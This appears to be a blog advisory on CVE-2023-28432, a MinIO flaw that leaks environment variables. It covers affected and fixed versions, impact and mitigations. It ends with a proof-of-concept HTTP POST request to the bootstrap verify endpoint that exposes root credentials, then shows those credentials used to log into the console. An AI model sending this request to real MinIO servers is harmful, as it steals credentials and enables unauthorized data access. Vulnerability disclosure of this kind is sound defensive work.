MinIO Information Disclosure – CVE-2023-28432

Posted on

Vulnerable Version

versions from RELEASE.2019-12-17T23-16-33Z up to RELEASE.2023-03-20T20-16-18Z.

Fixed Version

RELEASE.2023-03-20T20-16-18Z or later

Base Score

7.5 high                                                                  

Vendor Discription:-

MinIO is a high-performance, open-source object storage solution that fully supports Amazon S3 APIs. It is commonly used to store unstructured data such as photographs, movies, log files, and backups in both standalone and distributed (clustered) environments. MinIO is intended for cloud-native environments and provides scalability, high availability, and integration with Kubernetes. Because of its lightweight design and good API compatibility, it is widely used in organizations for private cloud storage and modern data lake designs.

CVE-2023-28432 description:

The vulnerability occurs when MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, exposing sensitive information. This means that unauthorized parties may gain access to critical information such as secret keys and passwords.

The vulnerable code is found in MinIO’s bootstrap-peer-server.go file, specifically in the VerifyHandler function. The code checks the cluster deployment and returns the system configuration, which includes environment variables.

The getServerSystemCfg function retrieves all environment variables beginning with the MINIO_ prefix and stores them in the system configuration.

Impact:

  • Sensitive Information Exposure: Allows unauthorized access to environment variables in MinIO cluster deployments.
  • Credentials Disclosure: Attackers can obtain secrets such as MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.
  • Unauthorized Access: Exposed credentials may permit attackers to log in and access MinIO services.
  • Data Manipulation: Attackers could read, modify, or delete data stored in the MinIO cluster.

Mitigations:-

  • Upgrade Immediately: Update MinIO to RELEASE.2023-03-20T20-16-18Z or later, where the vulnerability is patched.
  • Secure Secrets: Protect sensitive values (e.g., MINIO_SECRET_KEY, MINIO_ROOT_PASSWORD) and avoid storing them insecurely.
  • Restrict Network Access: Allow access to the MinIO cluster only from trusted and authorized hosts.
  • Follow Principle of Least Privilege: Limit user permissions to the minimum necessary.

POC

The issue exists in the API endpoint http://your-ip:9000/minio/bootstrap/v1/verify. Send the request to retrieve all environment variables:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
image

It can be seen that MINIO_ROOT_USER and MINIO_ROOT_PASSWORD is exposed.

Success in using this username and password to access the Web console:

image 2
image 4

POC Video

Leave a Reply

Your email address will not be published. Required fields are marked *